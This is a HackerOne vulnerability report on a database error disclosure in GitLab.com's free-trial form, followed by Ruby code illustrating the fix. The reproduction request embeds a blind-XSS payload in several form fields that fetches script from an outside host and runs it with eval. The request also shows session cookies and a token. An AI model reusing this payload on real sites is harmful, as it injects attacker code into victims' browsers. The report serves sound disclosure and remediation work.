DB Query disclosure through error message in "Start a Free Gold Trial" feature
HackerOne report #927090 by natarajankv91
on 2020-07-18, assigned to @rchan-gitlab:
Summary
It was possible to generate a DB error message which tells us the DB user (PostgreSQL) and the table details where Gold trial customer details are stored.
Steps to reproduce
- Log in to GitLab
- Complete the HTTP or API request:
POST /-/trials/create_lead?glm_content=user-billing&glm_source=gitlab.com HTTP/1.1
Host: gitlab.com
Connection: close
Content-Length: 900
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: https://gitlab.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://gitlab.com/-/trials/create_lead?glm_content=user-billing&glm_source=gitlab.com
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: __cfduid=d025a068c1e6b10400ca0e3ce662e50341595102310; experimentation_subject_id=eyJfcmFpbHMiOnsibWVzc2FnZSI6IklqWTFZVFEyWVdJMExXTmpORGN0TkRFek5DMDVNVGd6TFdJd1lqYzBZV001T1RNME1TST0iLCJleHAiOm51bGwsInB1ciI6ImNvb2tpZS5leHBlcmltZW50YXRpb25fc3ViamVjdF9pZCJ9fQ%3D%3D--3bba54388eee452727c84fcd0050d62d219d7212; cf_clearance=e4cec6f228b299661faa332c3c577e717f7090f5-1595102324-0-1z8820654aza8867a22zc6719c0b-150; _sp_ses.6b85=*; known_sign_in=NlVMY25ndmR4d0lBOW9NNkJJcHpxejZiajZ1RmV4b3dlTVZYYXdMMXh2RDRjVjBMb1cwUkdMdXpiMCswckdoeFhWUnlHb0hYLzFMSGVZRzZRelppY2EwWnVYc253dHM0Y20zOVZsYzhwZVFiMGExeG1aVlAvSjQ3dU1oWGtNYTc5N0tPNUtTZGIvUTZaUlB2RXErMGdBPT0tLU1qTTVXZEF0NWZYSDd3aklaRUhmcnc9PQ%3D%3D--65992ae7013a1d327c6f8c52da7df37078ea0100; _gitlab_session=90edf0d04a24cc884d0e3827f49ac13e; event_filter=all; _sp_id.6b85=e897f6a0-e541-4cff-9032-87c97aee745d.1595102326.1.1595104586.1595102326.cf9dfc01-9b30-4866-b457-1c98bcd83065
utf8=%E2%9C%93&authenticity_token=gkimQU1IFG465MikyPK0Y6QDQIFyCQgXmZjPX%2BhfL78Qmqr%2B0%2FlP%2FUSVuQJZQv%2B71cdW3HgL4zCkCX7jA81tiQ%3D%3D&first_name=Natarajan&last_name=%3Cscript%3Efunction+b%28%29%7Beval%28this.responseText%29%7D%3Ba%3Dnew+XMLHttpRequest%28%29%3Ba.addEventListener%28%22load%22%2C+b%29%3Ba.open%28%22GET%22%2C+%22%2F%2Fr0wdy.xss.ht%22%29%3Ba.send%28%29%3B%3C%2Fscript%3E&company_name=%3Cscript%3Efunction+b%28%29%7Beval%28this.responseText%29%7D%3Ba%3Dnew+XMLHttpRequest%28%29%3Ba.addEventListener%28%22load%22%2C+b%29%3Ba.open%28%22GET%22%2C+%22%2F%2Fr0wdy.xss.ht%22%29%3Ba.send%28%29%3B%3C%2Fscript%3E&company_size=1-99&phone_number=%3Cscript%3Efunction+b%28%29%7Beval%28this.responseText%29%7D%3Ba%3Dnew+XMLHttpRequest%28%29%3Ba.addEventListener%28%22load%22%2C+b%29%3Ba.open%28%22GET%22%2C+%22%2F%2Fr0wdy.xss.ht%22%29%3Ba.send%28%29%3B%3C%2Fscript%3E&number_of_users=1&country=AE
- Submit the request and you will observe the backend DB error message.
Impact
A user can learn the backend DB structure of GitLab and plan further enumeration and attacks against it.
What is the current bug behavior?
Screenshots attached: an error message displaying the failed SQL query is shown.
What is the expected correct behavior?
A generic error message should be displayed.
Relevant logs and/or screenshots
attached.
Output of checks
This bug happens on GitLab.com
Results of GitLab environment info
NA
Impact
An attacker can identify the DB being used and how the data is stored in the backend, and can plan further attacks on it.
Attachments
- [REDACTED]
Fix Approach
Modify http_post and also http_get for SubscriptionPortal to log the error, but display a generic error message to the customer.
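As an added illustration of that fix approach (example code, not GitLab's own SubscriptionPortal client): a hypothetical Ruby module with a leaky http_post that passes the upstream body through to the caller, beside a hardened http_post that writes the full detail to the server log and returns only a fixed generic message. The transport lambda and the upstream failure body are constructed stubs so the example runs offline.

```ruby
require 'logger'
require 'stringio'

# Added example, not GitLab's code: a hypothetical SubscriptionPortal client
# illustrating the fix approach (log the upstream error, show a generic message).
module SubscriptionPortalClient
  GENERIC_ERROR = 'Your request could not be processed. Please try again later.'.freeze

  # Constructed stand-in for a failing upstream response; the wording is
  # hypothetical and only mimics the shape of a leaked database error.
  SAMPLE_FAILURE = {
    status: 500,
    body: 'PG::UndefinedTable: ERROR: relation "example_trial_leads" does not exist'
  }.freeze

  # Default transport is a stub so the example runs offline; a real client
  # would perform the HTTP call here and return { status:, body: }.
  DEFAULT_TRANSPORT = ->(_path, _params) { SAMPLE_FAILURE }

  # Leaky variant (the reported behaviour): passes the upstream body through,
  # so a DB error text reaches the customer-facing page.
  def self.http_post_leaky(path, params, transport: DEFAULT_TRANSPORT)
    response = transport.call(path, params)
    return { success: true, data: response[:body] } if response[:status] == 200

    { success: false, error: response[:body] }
  end

  # Hardened variant: the full upstream detail goes to the server log only;
  # the caller gets a fixed generic message, including when the transport raises.
  def self.http_post(path, params, transport: DEFAULT_TRANSPORT, logger: Logger.new($stderr))
    response = transport.call(path, params)
    return { success: true, data: response[:body] } if response[:status] == 200

    logger.error("SubscriptionPortal POST #{path} failed with #{response[:status]}: #{response[:body]}")
    { success: false, error: GENERIC_ERROR }
  rescue StandardError => e
    logger.error("SubscriptionPortal POST #{path} raised #{e.class}: #{e.message}")
    { success: false, error: GENERIC_ERROR }
  end
end

if __FILE__ == $PROGRAM_NAME
  params = { first_name: 'Example', company_size: '1-99' }
  puts "leaky:    #{SubscriptionPortalClient.http_post_leaky('/trials/create_lead', params)[:error]}"
  puts "hardened: #{SubscriptionPortalClient.http_post('/trials/create_lead', params)[:error]}"
end
```

The same pattern applies to http_get; the point is that the customer-facing return value never carries the upstream error text, while the log still records it for operators.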